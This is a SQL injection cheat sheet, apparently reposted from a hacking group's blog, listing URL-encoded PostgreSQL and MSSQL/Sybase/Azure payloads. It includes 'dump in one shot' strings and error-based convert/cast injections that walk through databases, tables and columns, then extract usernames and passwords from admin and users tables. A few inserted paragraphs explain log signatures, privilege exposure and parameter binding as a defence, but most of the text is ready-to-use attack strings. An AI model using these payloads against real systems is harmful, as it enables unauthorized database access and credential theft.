SQL Injection – DB SQL ( Interbase / Firebird | Microsoft Azure | Oracle | PostgreSQL | Sybase | MSSQL )



MYSQL | SYBASE | POSTGRESQL | IBM DB2 | ORACLE | SQLITE | INFORMIX | FIREBIRD | MICROSOFT ACCESS | MICROSOFT SERVER [MSSQL] | PHPMYWIND [MYSQL] |

Re-Upload : 15 Juli 2022

@Arjuna Dewangga
@Javanese BlackHat ID 14

==================
Credit : Dewangga

– MICROSOFT AZURE INJECTION ( UNION AND ERROR BASED )
– ORACLE INJECTION ( ERROR BASED )
– POSTGRESQL INJECTION ( ERROR BASED )
– SYBASE MSSQL INJECTION ( ERROR BASED )
– FIREBIRD INJECTION ( ERROR BASED )

=================

substr(version(), 12,6) / etc

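# DIOS ("dump in one shot") – PostgreSQL

The string below concatenates version(), current_database(), two current_setting() values, inet_server_port()/inet_server_addr(), the current user, a pg_user row and every public-schema column name from information_schema.columns into one HTML-formatted value, so a single response carries the whole schema. It can only read what the application's own database role is allowed to read; hba_file and data_directory are visible only to a superuser or a member of pg_read_all_settings, so that part returning a value means the application connects with far more privilege than it needs. In request logs it appears as a long chain of CHR(..)|| calls next to information_schema inside one parameter.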

%24%24DEWANGGA%24%24||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24VERSION%3e%3e%3e%24%24||version()||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24DATABASE%3e%3e%3e %24%24||current_database()||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24DB FILES %3e%3e%3e %24%24||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – HBA%3e%3e%24%24||current_setting(%24%24hba_file%24%24)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – DIRECTORY %3e%3e%3e %24%24||current_setting(%24%24data_directory%24%24)||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24HOSTNAME%3e%3e%3e %24%24||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – PORT %3e%3e%3e %24%24||inet_server_port()||CHR(60)||CHR(98)||CHR(114)||CHR(62)||%24%24 – ADDR %3e%3e%3e %24%24||inet_server_addr()||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24USER %3e%3e%3e %24%24||user||CHR(60)||CHR(108)||CHR(105)||CHR(62)||%24%24PRIVILEGES %3e%3e%3e %24%24||(SELECT usename||%24%24 %3e%3e %24%24||usecreatedb||%24%24 %3e%3e %24%24||usesuper FROM pg_user)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(SELECT ARRAY_TO_STRING(array(SELECT(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name)::TEXT FROM information_schema.columns WHERE table_schema=%24%24public%24%24),CHR(60)||CHR(98)||CHR(114)||CHR(62)))

And 1=cast(‘Dew’||’%3cbr%3e’||version()||’%3cbr%3e’||(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,’:’,column_name)::TEXT),’%3cli%3e’)FROM+information_schema.columns+WHERE+table_schema+NOT+in(‘information_schema’,’pg_catalog’)) as integer)

–+- / and 1=1

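Cast(DIOS.. as int)/integer
Cast(DIOS.. as numeric)

(The cast to a numeric type is what makes this error based: the conversion fails and PostgreSQL quotes the offending string in the error message. It discloses data only where the application sends database error text back in the HTTP response.)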

# DIOS ( MICROSOFT SERVER ( MSSQL ) | AZURE | SYBASE )

And 1=0 UNION SELECT 1,concat(Dios),3–

and 1=cast(‘DEWANGGA’%2b’ || ‘%2bdb_name()%2b’||’%2b@@servername%2b’||’%2buser%2b’||’%2b@@version%2b’||’%2b(select+%2b’ ‘%2btable_name%2b’::’%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(”)) as nvarchar (4000))

CAST(DIOS..AS VARCHAR(4000))
CAST(DIOS..AS CHAR(4000))
(8000) (10000)

version
or 1=convert(numeric,(select @@version))#
current_db
or 1=convert(numeric,(select db_name()))#
Tables of current_db
or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55))#
Columns of selected table (admin_member)
or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653)))#
U/p
or 1=convert(numeric,(select min(name||0x3a||id||0x3a||passwd) from admin_member))#

Table
CoNCat(‘%3cli%3e’,name,’%3cli%3e’,id)
From DB..sysobjects where type=0x55 and id not in(1)

Column
CoNCat(‘%3cli%3e’,name,’%3cli%3e’,colid)
From DB..syscolumns where id=74653 and colid not in(1)

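ERROR BASED

convert(int, ...) on a string value fails, and the conversion error message includes that value. The requests below therefore disclose something only when the application returns the raw database error to the client. With the value passed as a bound parameter instead of being concatenated into the statement, the input is never parsed as SQL.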

Db_name @@version user @@servername
+and+1=convert(int,@@version)–

TABLE
+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))–

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+(‘products’)))–

not in(‘products’,’users’)))–

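If that errors, use CHAR(78)%2bCHAR(77) (a string built from character codes, with no quote characters in it, which is why stripping or escaping quotes in input does not stop this class of injection, while bound parameters do)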

COLUMN
+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=’users’))–

and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=’users’+
and+column_name+not+in+(‘username’)))–

not in(‘username’,’Password’)))–

U/P
and+1=convert(int,(select+top+1+username+from+users))–

DB
(select%2b’:’%2bname as t+from+master..sysdatabases FOR XML PATH(”))

Table
(select%2b’:’%2bname as t+from+database web..sysobjects FOR XML PATH(”))

(select%2b’:’%2bname as t+from+database web..sysobjects WHERE xtype = ‘U’ FOR XML PATH(”))

Column
(select%2b’:’%2bname as t+from+sycolumns FOR XML PATH(”))

(select%2b’:’%2bname as t FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tbl_name’ FOR XML PATH(”))

(select sqltext.text from sys.dm_exec_requests req cross apply sys.dm_exec_sql_text(req.sql_handle) AS sqltext)

#SQLI #Sqlinjection #sqlihardbypass
THANKS